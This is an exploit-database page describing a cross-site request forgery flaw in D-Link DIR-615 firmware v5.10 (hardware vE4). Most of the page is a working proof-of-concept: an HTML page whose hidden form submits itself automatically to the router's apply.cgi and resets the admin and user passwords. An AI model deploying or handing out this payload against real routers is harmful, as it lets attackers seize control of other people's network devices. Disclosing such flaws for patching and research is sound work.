[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Dlink DIR-615 Hardware vE4 Firmware v5.10 - CSRF Vulnerability

Author
Dhruv Shah
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-21925
Category
web applications
Date add
20-02-2014
Platform
hardware
Cross Site Request Forgery
 
This Modem's Web Application , suffers from Cross-site request forgery
 
through which attacker can manipulate user data via sending him malicious
 
craft url.
 
The Modems's Application  not using any security token to prevent it
 
against CSRF. You can manipulate any userdata. PoC and Exploit to change
 
user password:
 
 In the POC the IP address in the POST is the modems IP address.
 
 
 
<html>
 
  <body>
 
                <form id ="poc"action="http://192.168.0.1/apply.cgi"
method="POST">
 
      <input type="hidden" name="html_response_page"
value="back.asp" />
 
      <input type="hidden" name="html_response_message"
value="The setting is saved." />
 
      <input type="hidden" name="html_response_return_page"
value="login.asp" />
 
      <input type="hidden" name="reboot_type" value="none" />
 
      <input type="hidden" name="button1" value="Save Settings" />
 
      <input type="hidden" name="admin_password" value="test" />
 
      <input type="hidden" name="admin_password1" value="test" />
 
      <input type="hidden" name="admPass2" value="test" />
 
      <input type="hidden" name="user_password" value="test" />
 
      <input type="hidden" name="user_password1" value="test" />
 
      <input type="hidden" name="usrPass2" value="test" />
 
      <input type="hidden" name="hostname" value="DIR-615" />
 
      <input type="hidden" name="graphical_enable" value="1" />
 
      <input type="hidden" name="graph_auth_enable" value="1" />
 
      <input type="hidden" name="remote_http_management_enable"
value="0" />
 
      <input type="hidden"
name="remote_http_management_inbound_filter"
value="Allow_All" />
 
    </form>
 
  </body>
 
  <script
type="text/javascript">document.getElementById("poc").submit();</script>
 
</html>

#  0day.today [2024-12-27]  #